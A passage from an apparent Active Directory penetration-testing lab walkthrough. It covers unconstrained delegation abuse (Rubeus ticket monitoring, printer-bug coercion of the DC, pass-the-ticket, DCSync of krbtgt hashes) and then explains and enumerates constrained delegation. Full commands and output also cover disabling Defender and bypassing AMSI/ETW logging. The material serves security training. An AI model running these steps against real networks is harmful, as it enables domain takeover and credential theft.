bkKSwGpzzvyYHGwUjNY6nNvqfhmJ1ySb2u4lBZmOhKuXVn2FiHP4OXaRzBT8Y2k34yQXFeZW5sDwEp0V
LEkcVqlZjzdOyh3zoCq+rb0wyMAEpr7yeQfyiED1rpMSfYg77yvFGrILaTUPodjwlmC8sl3hrPLS7Fru
2DxuOrTBn+cuzn+5nGKk/5sAvEeyHef3LQ6QGwsr6/y9qyG+cInlw3QEMnlT4xHmNcl4cewCHdNS/09f
w6cNYdQK2CpM6qNRmBp8bzxtce1Cp1ZexEfjjZ53ELWpKAuR9B0agQNaQtZwHr50xJ1KHrDzgYYrFd70
m3zffh5boEB8FMdopNkMXQj2b0Pv2F1XQO9Jq6PTJN3RNLYiMQvhjw8+E0odTgBIogf6wto4yAISiro2
IhLmbyT7Kj9r7Es5Lb1nPMOn5yZZp4xsoztNdO2FcGrvCvM0GgKDPwD2meG1TEPr56Dj01stqc4yrXgR
YuAHhOyFzn28a1zfJM1CktL6DalaUoD79KBX6oZwNfq2g2P7RqSxG5CJtP2fAeW/q9OsGpp6Fp0FXDXc
z4ad1xL/Izr+99zx7SKkLIHsTzrxWmFgVh5+BWmpvL5hz9lsbOJoa0/wVgCU7583hxZizoqG+XP54NM7
3U6RSItU/R1WpA0+c5ZCcs5doOYLIKnPZPI1NiZkbOhiP5roQdxwliEgf2rmoBNGfFZl1Vv5k9Y5Hwp4
53v/Tv50Qz1eNvdLpywSF7MBgwCGGXWktenQjne8H7VOh5+pTnw6rudYHwuKKuH6grvQG3DPB9hQl7IE
lq2xr38PD0nTMhuK8W76d8e8iGfigFmqHgMrM63dD99sVztYIbRhpqvRB3MYbf2J9vsokUGx6zmAwvDM
IIYbqbaWQtHRfBz6bAIx42w+D2E+V48kG8KhTf+H4f0XxUfRKGOpeqmDkrajlgvp9mQTNiMtuyuCq+1F
O/l3AKbsfp36tJJx12UUwa94Dkvgk8fR4j5ZJTSXJuJGCseyHdK9+oq6MDQh9Vdb8k2hd9RmSNUFBA4u
DwvKqxzmTYlY0jZkeQES8kt+SkWagcwZanwXspxBJo2G7K+3jPezs/NY3NxVC3yH+nTthxUhtlo8fQvK
vPFMGVwxjyVuzf/IUeCj9+LvSsyKPf7lbxu4KvyOAR8rzyCyUMRrcYwDGqUljCHvWZ5+7FjXGKOCARMw
ggEPoAMCAQCiggEGBIIBAn2B/zCB/KCB+TCB9jCB86ArMCmgAwIBEqEiBCDfwmcpPwaRB3LYfh8AC2Ki
zqrPseKhF1ZWJcd+nS5NTaEcGxpET0xMQVJDT1JQLk1PTkVZQ09SUC5MT0NBTKIVMBOgAwIBAaEMMAob
CGFwcGFkbWluowcDBQBA4QAApREYDzIwMjQwNzAzMTM0NjM3WqYRGA8yMDI0MDcwMzIzNDYzN1qnERgP
MjAyNDA3MTAxMzQ2MzdaqBwbGkRPTExBUkNPUlAuTU9ORVlDT1JQLkxPQ0FMqS8wLaADAgECoSYwJBsG
a3JidGd0GxpET0xMQVJDT1JQLk1PTkVZQ09SUC5MT0NBTA==
[*] Target LUID: 0xe46398
[+] Ticket successfully imported!

ServiceName : krbtgt/DOLLARCORP.MONEYCORP.LOCAL
ServiceRealm : DOLLARCORP.MONEYCORP.LOCAL
UserName : appadmin
UserRealm : DOLLARCORP.MONEYCORP.LOCAL
StartTime : 7/3/2024 6:46:37 AM
EndTime : 7/3/2024 4:46:37 PM
RenewTill : 7/10/2024 6:46:37 AM
Flags : name_canonicalize, pre_authent, initial, renewable, forwardable
KeyType : aes256_cts_hmac_sha1
Base64(key) : 38JnKT8GkQdy2H4fAAtios6qz7HioRdWViXHfp0uTU0=
ASREP (key) : 68F08715061E4D0790E71B1245BF20B023D08822D2DF85BFF50A0E8136FFE4CB

A new command prompt carrying appadmin's TGT opens. In it we start PowerShell through InviShell (to keep the session out of PowerShell logging) and, over PSRemoting, disable Defender's real-time, behaviour, network and download scanning on dcorp-appsrv so that Rubeus can run there.
C:\Windows\system32>C:\Ad\Tools\InviShell\RunWithPathAsAdmin.bat

C:\Windows\system32>set COR_ENABLE_PROFILING=1

C:\Windows\system32>set COR_PROFILER={cf0d821e-299b-5307-a3d8-b283c03916db}

C:\Windows\system32>set COR_PROFILER_PATH=C:\AD\Tools\InviShell\InShellProf.dll

C:\Windows\system32>powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows

PS C:\Windows\system32> Invoke-Command -ComputerName dcorp-appsrv -ScriptBlock { $env:username;$env:computername }
appadmin
DCORP-APPSRV
PS C:\Windows\system32> Invoke-Command -ComputerName dcorp-appsrv -ScriptBlock { Set-MpPreference -DisableRealtimeMonitoring $true }
PS C:\Windows\system32> Invoke-Command -ComputerName dcorp-appsrv -ScriptBlock { Set-MpPreference -DisableBehaviorMonitoring $true }
PS C:\Windows\system32> Invoke-Command -ComputerName dcorp-appsrv -ScriptBlock { Set-MpPreference -DisableIntrusionPreventionSystem $true }
PS C:\Windows\system32> Invoke-Command -ComputerName dcorp-appsrv -ScriptBlock { Set-MpPreference -DisableIOAVProtection $true }

Next we need a high-privileged principal to authenticate to dcorp-appsrv so that its TGT ends up cached there. Rubeus has already been copied to C:\Users\Public on dcorp-appsrv; we will run it there in monitor mode, which polls the local ticket cache and prints every new TGT it sees for the chosen target.
PS C:\Windows\system32> Invoke-Command -ComputerName dcorp-appsrv -ScriptBlock { ls C:\Users\Public }

    Directory: C:\Users\Public

Mode                LastWriteTime         Length Name        PSComputerName
----                -------------         ------ ----        --------------
d-r---       11/11/2022 12:53 AM                Documents   dcorp-appsrv
d-r---         5/8/2021  1:15 AM                Downloads   dcorp-appsrv
d-r---         5/8/2021  1:15 AM                Music       dcorp-appsrv
d-r---         5/8/2021  1:15 AM                Pictures    dcorp-appsrv
d-r---         5/8/2021  1:15 AM                Videos      dcorp-appsrv
-a----         2/1/2024  1:25 PM         201216 Loader.exe  dcorp-appsrv
-a----       12/12/2022  5:02 PM        1039872 Rubeus.exe  dcorp-appsrv
PS C:\Windows\system32> Enter-PSSession -ComputerName dcorp-appsrv
[dcorp-appsrv]: PS C:\Users\appadmin\Documents> C:\Users\Public\Rubeus.exe monitor /interval:5 /target:dcorp-dc$ /nowrap

______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/

v2.2.1

[*] Action: TGT Monitoring


[*] Monitoring every 5 seconds for new TGTs

With Rubeus monitoring, we use the printer bug to coerce a high-privileged principal into authenticating to the unconstrained-delegation host.

The MS-RPRN (Print System Remote Protocol) interface lets any authenticated domain user make any machine that runs the Print Spooler service connect to a second machine of the caller's choice, via the RpcRemoteFindFirstPrinterChangeNotificationEx call. When the spooler on the DC authenticates to dcorp-appsrv, which is trusted for unconstrained delegation, it sends along a forwarded TGT for the DC machine account dcorp-dc$.

For our scenario, we force the domain controller to connect to the machine dcorp-appsrv.

In a new command prompt opened with our normal student privileges (any domain user is enough), we run the following command.
C:\Windows\system32>C:\Ad\Tools\MS-RPRN.exe \\dcorp-dc.dollarcorp.moneycorp.local \\dcorp-appsrv.dollarcorp.moneycorp.local
RpcRemoteFindFirstPrinterChangeNotificationEx failed.Error Code 1722 - The RPC server is unavailable.

The "Error Code 1722" message is expected and does not mean the coercion failed: the notification callback itself fails because dcorp-appsrv is not a print server, but by then the DC's spooler has already authenticated to dcorp-appsrv, which is what we needed.

In the Rubeus monitor we received the TGT (note the forwarded flag, which marks a TGT that was delegated rather than requested locally):

[*] 7/3/2024 2:32:31 PM UTC - Found new TGT:

User : [email protected]
StartTime : 7/3/2024 7:32:28 AM
EndTime : 7/3/2024 5:32:28 PM
RenewTill : 7/9/2024 10:01:43 PM
Flags : name_canonicalize, pre_authent, renewable, forwarded, forwardable
Base64EncodedTicket :

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
9SUC5MT0NBTA==

[*] Ticket cache size: 1

We now hold the TGT of dcorp-dc$. Next we inject it into our current logon session with Rubeus (ptt, pass the ticket); the klist output afterwards confirms it is cached.
C:\Windows\system32>C:\Ad\Tools\Rubeus.exe ptt
/ticket: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
1PTkVZQ09SUC5MT0NBTA==

______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/

v2.2.1

[*] Action: Import Ticket


[+] Ticket successfully imported!

C:\Windows\system32>klist

Current LogonId is 0:0x5631f


Cached Tickets: (1)

#0> Client: DCORP-DC$ @ DOLLARCORP.MONEYCORP.LOCAL


Server: krbtgt/DOLLARCORP.MONEYCORP.LOCAL @ DOLLARCORP.MONEYCORP.LOCAL
KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
Ticket Flags 0x60a10000 -> forwardable forwarded renewable pre_authent name_canonicalize
Start Time: 7/3/2024 7:32:28 (local)
End Time: 7/3/2024 17:32:28 (local)
Renew Time: 7/9/2024 22:01:43 (local)
Session Key Type: AES-256-CTS-HMAC-SHA1-96
Cache Flags: 0x1 -> PRIMARY
Kdc Called:

With the DC's TGT in our session we can run DCSync against the domain controller. In the output below, mimikatz first receives "-Path" and the BetterSafetyKatz path as commands (passed through by Loader.exe) and rejects them as unknown; those two errors are harmless, and lsadump::dcsync runs afterwards.
C:\Windows\system32>C:\AD\Tools\Loader.exe -Path "C:\AD\Tools\Old_Tools\BetterSafetyKatz.exe"
"lsadump::dcsync /user:dcorp\krbtgt" "exit"
[+] Successfully unhooked ETW!
[+] Successfully patched AMSI!
[+] URL/PATH : C:\AD\Tools\Old_Tools\BetterSafetyKatz.exe Arguments :
[+] Stolen from @harmj0y, @TheRealWover, @cobbr_io and @gentilkiwi, repurposed by @Flangvik and
@Mrtn9
[+] Randomizing strings in memory
[+] Suicide burn before CreateThread!

.#####. mimikatz 2.2.0 (x64) #19041 Dec 23 2022 16:49:51
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(commandline) # -Path
ERROR mimikatz_doLocal ; "-Path" command of "standard" module not found !

Module : standard
Full name : Standard module
Description : Basic commands (does not require module name)

exit - Quit mimikatz


cls - Clear screen (doesn't work with redirections, like PsExec)
answer - Answer to the Ultimate Question of Life, the Universe, and Everything
coffee - Please, make me a coffee!
sleep - Sleep an amount of milliseconds
log - Log mimikatz input/output to file
base64 - Switch file input/output base64
version - Display some version informations
cd - Change or display current directory
localtime - Displays system local date and time (OJ command)
hostname - Displays system local hostname

mimikatz(commandline) # C:\AD\Tools\Old_Tools\BetterSafetyKatz.exe
ERROR mimikatz_doLocal ; "C:\AD\Tools\Old_Tools\BetterSafetyKatz.exe" command of "standard"
module not found !

Module : standard
Full name : Standard module
Description : Basic commands (does not require module name)

exit - Quit mimikatz


cls - Clear screen (doesn't work with redirections, like PsExec)
answer - Answer to the Ultimate Question of Life, the Universe, and Everything
coffee - Please, make me a coffee!
sleep - Sleep an amount of milliseconds
log - Log mimikatz input/output to file
base64 - Switch file input/output base64
version - Display some version informations
cd - Change or display current directory
localtime - Displays system local date and time (OJ command)
hostname - Displays system local hostname

mimikatz(commandline) # lsadump::dcsync /user:dcorp\krbtgt


[DC] 'dollarcorp.moneycorp.local' will be the domain
[DC] 'dcorp-dc.dollarcorp.moneycorp.local' will be the DC server
[DC] 'dcorp\krbtgt' will be the user account
[rpc] Service : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)

Object RDN : krbtgt

** SAM ACCOUNT **

SAM Username : krbtgt


Account Type : 30000000 ( USER_OBJECT )
User Account Control : 00000202 ( ACCOUNTDISABLE NORMAL_ACCOUNT )
Account expiration :
Password last change : 11/11/2022 10:59:41 PM
Object Security ID : S-1-5-21-719815819-3726368948-3917688648-502
Object Relative ID : 502

Credentials:
Hash NTLM: 4e9815869d2090ccfca61c1fe0d23986
ntlm- 0: 4e9815869d2090ccfca61c1fe0d23986
lm - 0: ea03581a1268674a828bde6ab09db837

Supplemental Credentials:
* Primary:NTLM-Strong-NTOWF *
Random Value : 6d4cc4edd46d8c3d3e59250c91eac2bd

* Primary:Kerberos-Newer-Keys *
Default Salt : DOLLARCORP.MONEYCORP.LOCALkrbtgt
Default Iterations : 4096
Credentials
aes256_hmac (4096) : 154cb6624b1d859f7080a6615adc488f09f92843879b3d914cbcb5a8c3cda848
aes128_hmac (4096) : e74fa5a9aa05b2c0b2d196e226d8820e
des_cbc_md5 (4096) : 150ea2e934ab6b80

* Primary:Kerberos *
Default Salt : DOLLARCORP.MONEYCORP.LOCALkrbtgt
Credentials
des_cbc_md5 : 150ea2e934ab6b80

* Packages *
NTLM-Strong-NTOWF

* Primary:WDigest *
01 a0e60e247b498de4cacfac3ba615af01
02 86615bb9bf7e3c731ba1cb47aa89cf6d
03 637dfb61467fdb4f176fe844fd260bac
04 a0e60e247b498de4cacfac3ba615af01
05 86615bb9bf7e3c731ba1cb47aa89cf6d
06 d2874f937df1fd2b05f528c6e715ac7a
07 a0e60e247b498de4cacfac3ba615af01
08 e8ddc0d55ac23e847837791743b89d22
09 e8ddc0d55ac23e847837791743b89d22
10 5c324b8ab38cfca7542d5befb9849fd9
11 f84dfb60f743b1368ea571504e34863a
12 e8ddc0d55ac23e847837791743b89d22
13 2281b35faded13ae4d78e33a1ef26933
14 f84dfb60f743b1368ea571504e34863a
15 d9ef5ed74ef473e89a570a10a706813e
16 d9ef5ed74ef473e89a570a10a706813e
17 87c75daa20ad259a6f783d61602086aa
18 f0016c07fcff7d479633e8998c75bcf7
19 7c4e5eb0d5d517f945cf22d74fec380e
20 cb97816ac064a567fe37e8e8c863f2a7
21 5adaa49a00f2803658c71f617031b385
22 5adaa49a00f2803658c71f617031b385
23 6d86f0be7751c8607e4b47912115bef2
24 caa61bbf6b9c871af646935febf86b95
25 caa61bbf6b9c871af646935febf86b95
26 5d8e8f8f63b3bb6dd48db5d0352c194c
27 3e139d350a9063db51226cfab9e42aa1
28 d745c0538c8fd103d71229b017a987ce
29 40b43724fa76e22b0d610d656fb49ddd

mimikatz(commandline) # exit
Bye!

Constrained Delegation
Constrained delegation is a Kerberos feature that lets a service obtain tickets on behalf of a user, but only to the specific services listed for it, whether those run on the same host or on other hosts in the domain. This contrasts with unconstrained delegation, where a service holding the user's forwarded TGT can request tickets to any service.

It restricts the services to which the configured account can act on behalf of the client.

It does not rely on the user's forwarded TGT as unconstrained delegation does.

It is built on two Service-for-User (S4U) Kerberos extensions:

• S4U2self (the Kerberos Protocol Transition extension): allows a service to obtain a service ticket to itself on behalf of a user, as evidence that the user has authenticated. Any account with a registered SPN can invoke S4U2self, but whether the resulting ticket is forwardable (and therefore usable in S4U2proxy) depends on the rights of the service account (see Protocol Transition below).

• S4U2proxy (the Kerberos Constrained Delegation extension): allows a service to obtain a service ticket on behalf of a client to a different service. A service ticket for the client is required as evidence that the client has authenticated.

Two ways to configure the delegation:

• Kerberos Only: the service can delegate only when the client authenticated to it with Kerberos (uses S4U2proxy).

• Protocol Transition: the service can delegate regardless of how the client authenticated (uses S4U2self followed by S4U2proxy).

Setting up either configuration requires the SeEnableDelegationPrivilege user right, which by default only Domain Admins and Enterprise Admins hold.

The services to which an account can delegate are listed in its msDS-AllowedToDelegateTo attribute.

For our example, we have a user who is trying to authenticate to a backend database through a front end
web server.

Kerberos Only
Step-1: AS-REQ: the user authenticates to the DC and requests a TGT.

Step-2: AS-REP: the DC returns a signed and encrypted TGT and a session key to the user.

Step-3: TGS-REQ: the user presents the TGT to the DC and requests a service ticket for the Web service.

Step-4: TGS-REP: the DC responds with a service ticket for the Web service and a session key.

Step-5: AP-REQ: the user presents the service ticket to the Web Server, which decrypts it with its own key.

Step-6: The Web Server keeps the user's service ticket.

Step-7: The Web Server requests a service ticket for the backend database on behalf of the client. The request carries the Web Server's own TGT and the service ticket the user presented in Step-5 as evidence. This is the S4U2proxy request.

Step-8: The DC validates the Web Server's TGT, decrypts the user's service ticket and confirms that the user authenticated to the Web Server and that the evidence ticket is forwardable.

Step-9: The DC then checks the Web Server's msDS-AllowedToDelegateTo attribute, which lists the service (here the database SPN) the Web Server may delegate to, and returns a service ticket for the database issued in the user's name.

Step-10: The Web Server presents the new service ticket to the database server, which decrypts it with its own key.

Step-11: AP-REP from the database server to the Web Server, using the session key they now share.

Step-12: AP-REP from the Web Server to the user, using their session key.

Protocol Transition
We can use the same example with a slight variation. In the previous example the user initially authenticates to the Web Server with Kerberos. For protocol transition we assume the user logs on to the Web Server with a non-Kerberos protocol such as NTLM or forms-based authentication.

Step-1: The user authenticates to the Web Server using a non-Kerberos protocol.

Step-2: Because the user did not use Kerberos, the Web Server holds no service ticket for the user that it could present as evidence in S4U2proxy.

Step-3: The Web Server therefore requests, with its own TGT, a service ticket on behalf of the user whose target service is the Web Server itself. This is S4U2self.

Step-4: The DC checks whether the Web Server's account has the TRUSTED_TO_AUTH_FOR_DELEGATION flag set in userAccountControl. If it does, the DC returns a forwardable service ticket for the user to the Web Server. (Without the flag S4U2self still returns a ticket, but it is not forwardable and cannot be used in Step-6.)

Step-5: The Web Server receives and stores the service ticket.

Step-6: The Web Server now requests a service ticket for the backend database on behalf of the client. The request includes its own TGT and the service ticket it obtained through S4U2self as evidence. This is the S4U2proxy request.

Step-7: The DC validates the Web Server's TGT, decrypts the S4U2self ticket and confirms that the user has authenticated to the Web Server.

Step-8: The DC then checks the Web Server's msDS-AllowedToDelegateTo attribute, which lists the service (here the database SPN) the Web Server may delegate to, and returns a service ticket for the database issued in the user's name.

Step-9: The Web Server presents the new service ticket to the database server, which decrypts it with its own key.

Step-10: AP-REP from the database server to the Web Server, using the session key they now share.

Step-11: The Web Server responds to the user over the protocol the user originally authenticated with.

Enumeration
Using PowerView
C:\Windows\system32>C:\Ad\Tools\InviShell\RunWithPathAsAdmin.bat

C:\Windows\system32>set COR_ENABLE_PROFILING=1

C:\Windows\system32>set COR_PROFILER={cf0d821e-299b-5307-a3d8-b283c03916db}

C:\Windows\system32>set COR_PROFILER_PATH=C:\AD\Tools\InviShell\InShellProf.dll

C:\Windows\system32>powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows

PS C:\Windows\system32> . C:\Ad\Tools\PowerView.ps1
PS C:\Windows\system32> Get-DomainUser -TrustedToAuth
logoncount : 11
badpasswordtime : 12/31/1600 4:00:00 PM
distinguishedname : CN=web svc,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
objectclass : {top, person, organizationalPerson, user}
displayname : web svc
lastlogontimestamp : 5/17/2024 10:27:48 PM
userprincipalname : websvc
whencreated : 11/14/2022 12:42:13 PM
samaccountname : websvc
codepage : 0
samaccounttype : USER_OBJECT
accountexpires : NEVER
countrycode : 0
whenchanged : 5/18/2024 5:27:48 AM
instancetype : 4
usncreated : 38071
objectguid : b7ab147c-f929-4ad2-82c9-7e1b656492fe
sn : svc
lastlogoff : 12/31/1600 4:00:00 PM
msds-allowedtodelegateto : {CIFS/dcorp-mssql.dollarcorp.moneycorp.LOCAL, CIFS/dcorp-mssql}
objectcategory : CN=Person,CN=Schema,CN=Configuration,DC=moneycorp,DC=local
dscorepropagationdata : {11/14/2022 12:42:13 PM, 1/1/1601 12:00:00 AM}
serviceprincipalname : {SNMP/ufc-adminsrv.dollarcorp.moneycorp.LOCAL, SNMP/ufc-adminsrv}
givenname : web
usnchanged : 431258
lastlogon : 5/18/2024 3:11:43 AM
badpwdcount : 0
cn : web svc
useraccountcontrol : NORMAL_ACCOUNT, DONT_EXPIRE_PASSWORD, TRUSTED_TO_AUTH_FOR_DELEGATION
objectsid : S-1-5-21-719815819-3726368948-3917688648-1114
primarygroupid : 513
pwdlastset : 11/14/2022 4:42:13 AM
name : web svc

From an attacker's perspective, if we compromise the websvc account we can access the file system service (CIFS) on dcorp-mssql.dollarcorp.moneycorp.local as any domain user, including a domain admin, except for accounts marked "sensitive and cannot be delegated" or placed in the Protected Users group.
PS C:\Windows\system32> Get-DomainComputer -TrustedToAuth

pwdlastset : 11/11/2022 11:16:12 PM
logoncount : 80
badpasswordtime : 5/18/2024 3:13:09 AM
distinguishedname : CN=DCORP-
ADMINSRV,OU=Applocked,DC=dollarcorp,DC=moneycorp,DC=local
objectclass : {top, person, organizationalPerson, user...}
lastlogontimestamp : 6/26/2024 9:02:25 PM
whencreated : 11/12/2022 7:16:12 AM
samaccountname : DCORP-ADMINSRV$
localpolicyflags : 0
codepage : 0
samaccounttype : MACHINE_ACCOUNT
whenchanged : 6/27/2024 4:02:25 AM
accountexpires : NEVER
countrycode : 0
operatingsystem : Windows Server 2022 Datacenter
instancetype : 4
useraccountcontrol : WORKSTATION_TRUST_ACCOUNT, TRUSTED_TO_AUTH_FOR_DELEGATION
objectguid : 2e036483-7f45-4416-8a62-893618556370
operatingsystemversion : 10.0 (20348)
lastlogoff : 12/31/1600 4:00:00 PM
msds-allowedtodelegateto : {TIME/dcorp-dc.dollarcorp.moneycorp.LOCAL, TIME/dcorp-DC}
objectcategory : CN=Computer,CN=Schema,CN=Configuration,DC=moneycorp,DC=local
dscorepropagationdata : {11/15/2022 4:16:45 AM, 1/1/1601 12:00:00 AM}
serviceprincipalname : {WSMAN/dcorp-adminsrv, WSMAN/dcorp-
adminsrv.dollarcorp.moneycorp.local,
